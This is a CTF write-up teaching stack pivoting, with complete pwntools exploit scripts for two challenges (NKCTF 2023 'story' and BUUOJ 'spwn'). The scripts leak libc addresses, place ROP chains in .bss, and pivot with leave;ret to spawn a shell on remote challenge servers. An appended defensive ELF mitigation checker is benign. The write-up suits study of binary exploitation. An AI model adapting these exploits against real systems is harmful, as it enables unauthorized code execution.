Stack Pivoting Basics
a_story_of_a_pwner
This is a challenge from NKCTF 2023.
Run checksec, then open the binary in IDA.
The program presents a menu; going through each option reveals the following.
The first three options are similar: each calls read() into a fixed address in the .bss section.
Option four has two cases.
One branch leaks the address of puts, which gives us the libc base. After going through options 1, 2 and 3 we choose option 4 to trigger the stack overflow. The overflow is too short to hold a ROP chain, so instead we write pop_rdi, the address of system and the address of "/bin/sh" into the .bss buffers through the first three options and pivot the stack there.
exp:
```python
from pwn import *

io = remote('node2.yuzhian.com.cn', 39708)
# io = process('./story')
elf = ELF('./story')
libc = ELF('./libc.so.6')

# Option 4 first: one branch prints the address of puts, which leaks libc.
io.recvuntil(b"> ")
io.sendline(b'4')
io.recvuntil(b"I give it up, you can see this. 0x")
puts_addr = int(io.recv(12), 16)
log.success("puts_addr=" + hex(puts_addr))
libcbase = puts_addr - libc.sym['puts']
sys_addr = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b"/bin/sh"))

pop_rdi = 0x401573    # pop rdi; ret gadget in the binary
leave_ret = 0x40139e  # leave; ret gadget used for the pivot

# Options 1-3 each read() into a fixed .bss buffer; the ROP chain is laid out there.
# The prompt strings must match the binary's output exactly (they differ per option).
io.recvuntil(b"> ")
io.sendline(b'2')
io.recvuntil(b"what's your corment?\n")
io.send(p64(pop_rdi))
io.recvuntil(b"> ")
io.sendline(b'1')
io.recvuntil(b"what's your comment?\n")
io.send(p64(binsh))
io.recvuntil(b"> ")
io.sendline(b'3')
io.recvuntil(b"what's your corMenT?\n")
io.send(p64(sys_addr))

# Option 4 again: the short overflow only has to overwrite the saved rbp with
# (chain address - 8) and the return address with leave;ret. leave then moves
# rsp onto the .bss chain and ret starts executing it.
io.recvuntil(b"> ")
io.sendline(b'4')
io.recvuntil(b"now, come and read my heart...\n")
payload = b'a' * 10 + p64(0x4050A0 - 0x8) + p64(leave_ret)
io.sendline(payload)
io.interactive()
```
[Black Watch 入群题]PWN
Run checksec.
IDA:
There are two read() calls. The first reads into the .bss section, and the second overflows the stack by only 8 bytes, clearly not enough to build a ROP chain there. So we pivot the stack to .bss and build the ROP chain in the first input.
We need to pivot twice, however: the first time to leak libc, the second time to get a shell.
exp:
```python
from pwn import *
from LibcSearcher import *

# io = process('./spwn')
io = remote('node4.buuoj.cn', 29977)
elf = ELF('./spwn')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x8048513
bss_addr = 0x0804A300    # where the first read() stores the "name" input
leave_ret = 0x08048408   # leave; ret gadget

# First input (into .bss): ROP chain write(1, write_got, 4), returning to main afterwards.
payload = p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)
io.recvuntil(b"What is your name?")
io.send(payload)
# Second input: the 8-byte overflow covers saved ebp (bss_addr - 4) and the return
# address (leave;ret), so leave lands esp on the .bss chain and ret runs it.
payload1 = b'a' * 0x18 + p32(bss_addr - 4) + p32(leave_ret)
io.recvuntil(b"What do you want to say?")
io.send(payload1)

write_addr = u32(io.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

# Second round: same pivot, but this time the .bss chain is system("/bin/sh").
io.recvuntil(b"name?")
payload = p32(sys_addr) + p32(0) + p32(binsh)
io.sendline(payload)
io.recvuntil(b"say?")
io.sendline(payload1)
io.interactive()
```
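As an added defender-side example, not part of the original writeup or either challenge: the header check behind the `checksec` step of both solutions, read directly from the ELF program headers. Both exploits hard-code .bss and gadget addresses (0x4050A0, 0x0804A300), which only works on a non-PIE binary, so the PIE result is the one that decides whether a pivot like this is even possible. The names `elf_mitigations` and `make_elf64` are chosen here; `make_elf64` builds a constructed, headers-only sample image so the script runs offline, and passing a path on the command line checks a real file instead.

```python
import struct

# ELF constants from the ELF specification
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1

def elf_mitigations(data: bytes) -> dict:
    """Report PIE / NX / RELRO for a little-endian ELF32 or ELF64 image.

    A non-PIE binary (e_type == ET_EXEC) keeps .bss and gadgets at fixed
    addresses, which is what lets the writeups above hard-code them."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2
    e_type, = struct.unpack_from("<H", data, 16)
    if is64:
        e_phoff, = struct.unpack_from("<Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        e_phoff, = struct.unpack_from("<I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx, relro = False, False  # no PT_GNU_STACK at all means an executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", data, off)
        # p_flags follows p_type in ELF64 but sits at offset 24 in ELF32
        p_flags, = struct.unpack_from("<I", data, off + (4 if is64 else 24))
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"bits": 64 if is64 else 32, "pie": e_type == ET_DYN, "nx": nx, "relro": relro}

def make_elf64(e_type: int, stack_flags: int, with_relro: bool = True) -> bytes:
    """Constructed, headers-only ELF64 sample so the check runs offline
    (sample data, not a binary from either challenge)."""
    phdrs = [(PT_GNU_STACK, stack_flags)] + ([(PT_GNU_RELRO, 4)] if with_relro else [])
    ehdr = b"\x7fELF" + bytes([2, 1, 1]) + b"\0" * 9   # ELFCLASS64, little-endian
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x401000, 64, 0, 0,
                        64, 56, len(phdrs), 64, 0, 0)   # e_phoff=64, e_phentsize=56
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + body

if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_elf64(ET_EXEC, 6)
    print(elf_mitigations(image))
```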